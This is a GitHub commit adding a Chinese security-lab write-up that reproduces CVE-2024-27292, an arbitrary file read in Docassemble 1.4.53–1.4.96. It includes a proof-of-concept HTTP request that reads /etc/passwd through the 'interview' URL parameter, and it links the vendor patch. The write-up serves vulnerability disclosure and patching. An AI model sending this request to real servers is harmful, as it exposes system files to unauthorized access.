-
Notifications
You must be signed in to change notification settings - Fork 379
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Upload new file: 【成功复现】Docassemble 任意文件读取漏洞 (CVE-2024-27292).md via s…
…impread
- Loading branch information
Showing
1 changed file
with
111 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,111 @@ | ||
> 本文由 [简悦 SimpRead](http:https://ksria.com/simpread/) 转码, 原文地址 [mp.weixin.qq.com](https://mp.weixin.qq.com/s/bOufPH6qtWpgZhsbrCeiCQ) | ||
|
||
|
||
网安引领时代,弥天点亮未来 | ||
|
||
|
||
|
||
|
||
|
||
![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hDCVZx96ZMibcJI8GEwNnAyx4yiavy2qelCaTeSAibEeFrVtpyibBCicjbzwDkmBJDj9xBWJ6ff10OTQ2w/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp) | ||
|
||
|
||
|
||
**0x00 写在前面** | ||
|
||
**本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!** | ||
|
||
![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hDCVZx96ZMibcJI8GEwNnAyx4yiavy2qelCaTeSAibEeFrVtpyibBCicjbzwDkmBJDj9xBWJ6ff10OTQ2w/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp) | ||
|
||
|
||
|
||
**0x01 漏洞介绍** | ||
|
||
![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hDwClBRbwB3oZicAIICS58TnSomPDqoWryIbBncWJUicOrXaicmqLattLcxRSsKOYG0iaUBiaQoyYJV48w/640?wx_fmt=png&from=appmsg) | ||
|
||
Docassemble 是 Jonathan Pyle 个人开发者的一个免费的开源专家系统,用于指导访谈和文档组装。 | ||
|
||
Docassemble 1.4.53 至 1.4.96 版本存在安全漏洞,该漏洞源于允许攻击者通过操作 URL 获得对系统信息的未授权的访问。 | ||
|
||
![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hDCVZx96ZMibcJI8GEwNnAyx4yiavy2qelCaTeSAibEeFrVtpyibBCicjbzwDkmBJDj9xBWJ6ff10OTQ2w/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp) | ||
|
||
|
||
|
||
**0x02 影响版本** | ||
|
||
Docassemble Docassemble 1.4.96 | ||
|
||
Docassemble Docassemble 1.4.53 | ||
|
||
![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hDwClBRbwB3oZicAIICS58TnHonPPZzeOzqN4EhdNdXnHfx2EO8tibYC5kAyBOaNRgZUbMrm3NDMLuw/640?wx_fmt=png&from=appmsg) | ||
|
||
![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hDCVZx96ZMibcJI8GEwNnAyx4yiavy2qelCaTeSAibEeFrVtpyibBCicjbzwDkmBJDj9xBWJ6ff10OTQ2w/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp) | ||
|
||
|
||
|
||
**0x03 漏洞复现** | ||
|
||
1. 访问漏洞环境 | ||
|
||
![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hDwClBRbwB3oZicAIICS58TnOQmZEEkJrDwCLa3Hic2suvBQQibBPI2Of1a6D46YAPR8TIjUwyUTntdQ/640?wx_fmt=png&from=appmsg) | ||
|
||
2. 对漏洞进行复现 | ||
|
||
**POC** | ||
|
||
漏洞复现 | ||
|
||
``` | ||
GET /interview?i=/etc/passwd HTTP/1.1 | ||
Host: 127.0.0.1 | ||
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400) | ||
``` | ||
|
||
文件读取成功。 | ||
|
||
![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hDwClBRbwB3oZicAIICS58TnNmbQZqAicLjuhvgTx9RIicCkV2GxL4Oyhfibaycvh378xF5UDgBAaibmBQ/640?wx_fmt=png&from=appmsg) | ||
|
||
3.Yakit 工具加载 nuclei 文件测试(漏洞存在) | ||
|
||
![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hDwClBRbwB3oZicAIICS58TncG3MExtjMHoUKJbFmicBlvtWQRxvLwJBK4zwpDZfx7IFs9VFMgZbETg/640?wx_fmt=png&from=appmsg) | ||
|
||
![](https://mmbiz.qpic.cn/mmbiz_png/MjmKb3ap0hDCVZx96ZMibcJI8GEwNnAyx4yiavy2qelCaTeSAibEeFrVtpyibBCicjbzwDkmBJDj9xBWJ6ff10OTQ2w/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp) | ||
|
||
|
||
|
||
**0x04 修复建议** | ||
|
||
|
||
|
||
目前厂商已发布升级补丁以修复漏洞,补丁获取链接: | ||
|
||
``` | ||
https://github.com/jhpyle/docassemble/commit/97f77dc486a26a22ba804765bfd7058aabd600c9 | ||
``` | ||
|
||
弥天简介 | ||
|
||
学海浩茫,予以风动,必降弥天之润!弥天安全实验室成立于 2019 年 2 月 19 日,主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子,也是民间组织。主要以技术共享、交流等不断赋能自己,赋能安全圈,为网络安全发展贡献自己的微薄之力。 | ||
|
||
口号 网安引领时代,弥天点亮未来 | ||
|
||
![](https://mmbiz.qpic.cn/mmbiz_gif/b96CibCt70iaaqjXT4YxgHVARD1NNv0RvKtiaAvXhmruVqgavPY3stwrfvLKetGycKUfxIq3Xc6F6dhU7eb4oh2gg/640?wx_fmt=gif&wxfrom=5&wx_lazy=1&tp=webp) | ||
|
||
知识分享完了 | ||
|
||
喜欢别忘了关注我们哦~ | ||
|
||
学海浩茫, | ||
|
||
予以风动, | ||
|
||
必降弥天之润! | ||
|
||
弥 天 | ||
|
||
安全实验室 | ||
|
||
![](https://mmbiz.qpic.cn/mmbiz_jpg/MjmKb3ap0hDyTJAqicycpl7ZakwfehdOgvOqd7bOUjVTdwxpfudPLOJcLiaSZnMC7pDDdlIF4TWBWWYnD04wX7uA/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp) |